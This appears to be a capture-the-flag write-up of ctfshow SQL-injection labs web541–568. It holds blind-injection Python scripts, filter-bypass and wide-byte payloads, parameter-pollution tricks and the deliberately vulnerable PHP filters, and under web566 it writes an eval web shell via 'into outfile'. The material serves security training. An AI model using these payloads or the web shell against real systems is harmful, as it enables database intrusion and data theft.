        # payload = f'if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema="ctfshow")),{i},1))>{mid},sleep(1),0)'
        # payload = f'if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_schema="ctfshow")),{i},1))>{mid},sleep(0.7),0)'
        payload = f'if(ascii(substr((select/**/group_concat(flag4)from(ctfshow.flag)),{i},1))>{mid},sleep(0.6),0)'
        # the condition rides inside the registered username: per the listed
        # pass_change.php, $_SESSION["username"] is spliced unescaped into
        # the UPDATE, so the timing shows up at the password-change step
        # (second-order injection). A fresh account is registered per probe.
        username = f"admin' and {payload} or '1'='1"
        # url1..url3 are loop-invariant; they are simply reassigned each probe
        url1 = 'http://88168b56-d788-46e8-be60-ead77e054e6f.challenge.ctf.show/login_create.php'
        data = {
            'username': username,
            'password': '1',
            're_password': '1',
            'submit': 'Register'
        }
        r = session.post(url1, data=data)  # response unused
        url2 = 'http://88168b56-d788-46e8-be60-ead77e054e6f.challenge.ctf.show/login.php'
        data = {
            'login_user': username,
            'login_password': '1',
            'mysubmit': 'Login',
        }
        r = session.post(url2, data=data)  # response unused; presumably only the session cookie matters
        url3 = 'http://88168b56-d788-46e8-be60-ead77e054e6f.challenge.ctf.show/pass_change.php'
        data = {
            'current_password': '1',
            'password': '2',
            're_password': '2',
            'submit': 'Reset'
        }

        # timing oracle at the password change: a reply within the 0.5 s
        # timeout means sleep(0.6) did not run (condition false). Any
        # exception is read as "condition true" — the except is bare, so a
        # connection error is misread the same way as the timeout.
        try:
            r = session.post(url3,data=data,timeout=0.5)
            tail = mid
        except:
            head = mid + 1


    # head stays at 32 when the comparison never held, which is read as
    # "no character at position i"; a real space (code 32) also stops it
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)  # progress after every recovered character

web541

过滤了or和and
使用重写绕过

%27aandnd%20updatexml(1,concat(0x3d,(select%20group_concat(schema_name)%20from%20infoorrmation_schema.schemata)),1)--+
%27aandnd%20updatexml(1,concat(0x3d,(select%20group_concat(table_name)%20from%20infoorrmation_schema.tables where table_schema="ctfshow")),1)--+
%27aandnd%20updatexml(1,concat(0x3d,(select%20group_concat(column_name)%20from%20infoorrmation_schema.columns where table_schema="ctfshow")),1)--+
%27aandnd%20updatexml(1,concat(0x3d,(select%20flag4s%20from%20ctfshow.flags)),1)--+
%27aandnd%20updatexml(1,concat(0x3d,(select%20right(flag4s,20)%20from%20ctfshow.flags)),1)--+

web542

不能使用报错注入,但是有回显,使用union注入。
还是同样的双写绕过过滤。

-1%20union%20select%201,2,group_concat(table_name)%20from%20infoorrmation_schema.tables where table_schema='ctfshow'%23
-1%20union%20select%201,2,group_concat(column_name)%20from%20infoorrmation_schema.columns where table_schema='ctfshow'%23
-1%20union%20select%201,2,group_concat(flag4s)%20from%20ctfshow.flags%23

web543

过滤了空格和注释符

绕过空格方式:

%09 TAB 键(水平)
%0a 新建一行
%0c 新的一页
%0d return 功能
%0b TAB 键(垂直)
%a0 空格

这里用括号的方式,和||代替or来绕过。

注释符都被过滤掉了,最后的引号我们需要闭合。

999%27||updatexml(1,concat(0x7e,(select((flag4s))from(ctfshow.flags)),0x7e),1)||%27
999%27||updatexml(1,concat(0x7e,(select(right(flag4s,20))from(ctfshow.flags)),0x7e),1)||%27

web544

')闭合
没有报错信息
使用上题方法,改为布尔盲注。

import requests

url = "http://6ec46794-6350-449e-8a3b-361aac041abf.challenge.ctf.show/"

result = ''  # characters recovered so far, in order
i = 0  # 1-based substr() position; incremented once per outer iteration

while True:
    i = i + 1
    # binary search over the printable-ASCII window [32, 127) for the code
    # of character i
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # earlier stages, kept for reference: table names, then column names
        # payload = f'if(ascii(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema="ctfshow")),{i},1))>{mid},1,0)'
        # payload = f'if(ascii(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema="ctfshow")),{i},1))>{mid},1,0)'
        payload = f'if(ascii(substr((select(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0)'
        # sent as the "id" query parameter; requests URL-encodes the value.
        # The ('...') context is closed and reopened around the condition
        # because, per the writeup, comment markers are filtered here.
        data = {
            'id': f"999')||{payload}||('0"
        }
        r = requests.get(url,params=data)
        # boolean oracle: "Dumb" in the response is taken to mean the
        # injected condition ascii(...) > mid held, so search upward
        if "Dumb" in r.text:
            head = mid + 1
        else:
            tail = mid

    # head stays at 32 when the comparison never held, which is read as
    # "no character at position i"; a real space (code 32) also stops it
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)  # progress after every recovered character

web545

过滤了select,union,空格

<?php
// Single-pass keyword/character blacklist. Each preg_replace runs exactly once
// and the result is not re-scanned, so a keyword that reassembles after an
// inner match is removed survives — the weakness the writeup exploits. The
// lowercase 'select' rule appears twice, hence the writeup's extra nesting.
// A blacklist like this is not a substitute for parameterised queries.
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);		//strip out every '/' and '*' character (a class, not the "/*" sequence)
$id= preg_replace('/[--]/',"", $id);		//strip out every '-' (one-character class; "--" goes with it)
$id= preg_replace('/[#]/',"", $id);			//strip out '#'
$id= preg_replace('/[ +]/',"", $id);	    //strip out spaces and '+'
$id= preg_replace('/select/m',"", $id);	    //strip out lowercase 'select' (first pass; original comment wrongly said spaces)
$id= preg_replace('/[ +]/',"", $id);	    //strip out spaces and '+' again (duplicate of the rule two lines up)
$id= preg_replace('/union/s',"", $id);	    //strip out union
$id= preg_replace('/select/s',"", $id);	    //strip out select (second pass)
$id= preg_replace('/UNION/s',"", $id);	    //strip out UNION
$id= preg_replace('/SELECT/s',"", $id);	    //strip out SELECT
$id= preg_replace('/Union/s',"", $id);	    //strip out Union
$id= preg_replace('/Select/s',"", $id);	    //strip out Select
return $id;
}

过滤了许多,但还是可以用重写的方式来绕过
因为select过滤了两次,需要多套一层。

报错注入

%27and%0aupdatexml(1,concat(0x3d,(seselselectectlect%0agroup_concat(schema_name)%0afrom%0ainformation_schema.schemata)),1)and%27

直接使用union注入也行

999%27%0auunionnion%0aseseselectlectlect%0a1,(seleseselectlectct%0aflag4s%0afrom%0actfshow.flags),%273

web546

同上题,"闭合

999"%0auunionnion%0aseseselectlectlect%0a1,(seleseselectlectct%0aflag4s%0afrom%0actfshow.flags),"3

web547

')闭合,更改了过滤规则。

<?php
// Variant of the blacklist from web545: the standalone 'select' rule is
// commented out and replaced by a single case-insensitive rule that only
// matches "union" followed by at least one whitespace character and then
// "select". Still a single non-recursive pass, so the same reassembly
// weakness applies; a blacklist is not a substitute for parameterised queries.
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id);				//strip out every '/' and '*' character
$id= preg_replace('/[--]/',"", $id);				//strip out every '-'
$id= preg_replace('/[#]/',"", $id);					//strip out '#'
$id= preg_replace('/[ +]/',"", $id);	    		//strip out spaces and '+'
//$id= preg_replace('/select/m',"", $id);	   		 	//(disabled in this variant)
$id= preg_replace('/[ +]/',"", $id);	    		//strip out spaces and '+' again (duplicate rule)
$id= preg_replace('/union\s+select/i',"", $id);	    //strip out "union<whitespace>select", any case
return $id;
}

过滤了union\s+select,同样使用重写的方式。

999%27)%0aunion%0aunion%0aselectselect%0a1,(select%0aflag4s%0afrom%0actfshow.flags),(%273

web548

同上

web549

提示有waf
分析下代码

<?php
// Challenge entry point (legacy mysql_* API). Two different readings of the
// same query string are used: java_implimentation() returns the value of the
// FIRST id= pair and that is what whitelist() checks, while $_GET['id'] —
// which per the writeup yields the LAST id= pair — is what reaches the query.
// whitelist() also does not stop execution on failure (see its definition),
// so the query below runs regardless. Same statements as the original
// listing; only layout and comments differ.
include("../sql-connections/sql-connect.php");
error_reporting(0);

if (isset($_GET['id'])) {
    $qs = $_SERVER['QUERY_STRING'];
    $hint = $qs;
    $id1 = java_implimentation($qs);
    $id = $_GET['id'];
    //echo $id1;
    whitelist($id1);

    // every submitted id is appended to result.txt before the query runs
    $fp = fopen('result.txt', 'a');
    fwrite($fp, 'ID:' . $id . "\n");
    fclose($fp);

    // $id is interpolated unescaped; the raw driver error is printed below
    $sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result = mysql_query($sql);
    $row = mysql_fetch_array($result);
    if ($row) {
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:' . $row['username'];
        echo "<br>";
        echo 'Your Password:' . $row['password'];
        echo "</font>";
    } else {
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";
    }
} else {
    echo "Please input the ID as parameter with numeric value";
}
//WAF implimentation with a whitelist approach..... only allows input to be Numeric.
// Numeric-only allowlist for the value handed to it. On a non-numeric input
// it only sets a Location header: there is no exit/die, so the caller keeps
// running and still executes its query. Returns nothing in either branch.
function whitelist($input)
{
	$match = preg_match("/^\d+$/", $input);
	if($match)
	{
		//echo "you are good";
		//return $match;
	}
	else
	{	
		header('Location: hacked.php');	// NOTE(review): no exit after header(); execution continues in the caller
		//echo "you are bad";
	}
}

// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
// Splits the raw query string on '&' and returns the value of the FIRST pair
// whose first two characters are "id" — at most 30 characters of it (substr
// offset 3, length 30). Returns null when no such pair exists. This differs
// from $_GET['id'] in the caller, which per the writeup yields the LAST id=
// pair; the two values can disagree.
function java_implimentation($query_string)
{
	$q_s = $query_string;
	$qs_array= explode("&",$q_s);


	foreach($qs_array as $key => $value)
	{
		$val=substr($value,0,2);	// only the first two characters are compared
		if($val=="id")
		{
			$id_value=substr($value,3,30); 
			return $id_value;
			echo "<br>";	// unreachable: follows the return
			break;
		}

	}

}

发现会对id1进行检查,必须为数字,这里没法绕过;但是传入sql语句的是id。id1取的是第一个名为id的参数的值,而$_GET['id']会取最后一个id参数的值。

?id=1&id=-1%27%20union%20select%201,2,(select%20flag4s%20from%20ctfshow.flags)--+

web550

同上,"闭合

?id=1&id=-1"%20union%20select%201,2,(select%20flag4s%20from%20ctfshow.flags)--+

web551

同上,")闭合

?id=1&id=-1")%20union%20select%201,2,(select%20flag4s%20from%20ctfshow.flags)--+

web552

绕过转义函数addslashes
宽字节注入。

mysql有一个特性:在使用GBK编码时,会把两个字节当作一个汉字(前一个字节的ascii码要大于128,才在汉字的范围内)

%df%27%20union%20select%201,2,(select%20flag4s%20from%20ctfshow.flags)--+

web553

同上

web554

也是宽字节注入

uname=%df%27%20union%20select%201,(select%20flag4s%20from%20ctfshow.flags)--+&passwd=&submit=Submit

web555

这里没有引号,不需要绕过addslashes,直接注入就行。

-1%20union%20select%201,2,(select%20flag4s%20from%20ctfshow.flags)--+

web556

这里改用了mysql_real_escape_string函数

但是需要在执行sql语句之前调用mysql_set_charset函数,把当前连接的字符集设置为gbk,才能完整地防御。

同样使用宽字节注入

%df%27%20union%20select%201,2,(select%20flag4s%20from%20ctfshow.flags)--+

web557

uname=%df%27%20union%20select%201,(select%20flag4s%20from%20ctfshow.flags)--+&passwd=123&submit=Submit

web558

用了mysqli_multi_query函数,可以使用堆叠注入,但是union注入也可以。

-1%27%20union%20select%201,2,(select%20flag4s%20from%20ctfshow.flags)--+

web559

同上

-1%20union%20select%201,2,(select%20flag4s%20from%20ctfshow.flags)--+

web560

同上

-1%27)union%20select%201,2,(select%20flag4s%20from%20ctfshow.flags)--+

web561

同上

-1%20union%20select%201,2,(select%20flag4s%20from%20ctfshow.flags)--+

web562

username处做了过滤,在passwd处注入。

login_user=123&login_password=-1%20%27union%20select%201,(select%20flag4s%20from%20ctfshow.flags),3--+&mysubmit=Login

web563

同上,')闭合

login_user=132&login_password=-1%20%27)union%20select%201,(select%20flag4s%20from%20ctfshow.flags),3--+&mysubmit=Login

web564

order by类型注入

报错注入

?sort=updatexml(0,(select%20flag4s%20from%20ctfshow.flags),1)
?sort=updatexml(0,(select%20right(flag4s,20)%20from%20ctfshow.flags),1)

web565

同上,'闭合

?sort=%27%20and%20updatexml(0,(select%20flag4s%20from%20ctfshow.flags),1)--+
?sort=%27%20and%20updatexml(0,(select%20right(flag4s,20)%20from%20ctfshow.flags),1)--+

web566

同上,但没有报错输出了
使用盲注的方式

这里还能用into outfile写shell的方式。

?sort=1 into outfile "/var/www/html/1.php"lines terminated by 0x3c3f706870206576616c28245f504f53545b315d293b3f3e2020--+

写php脚本来查询

<?php
// Query loop from the writeup: reads flag4s from ctfshow.flags and echoes the
// first column of every row in parentheses; '@' suppresses driver warnings.
$q=@mysql_query("select flag4s from ctfshow.flags");while($rs=@mysql_fetch_row($q)){echo(" (".$rs[0].")");}

web567

同上

web568

同上,'闭合

参考文章

https://blog.csdn.net/solitudi/article/details/115534124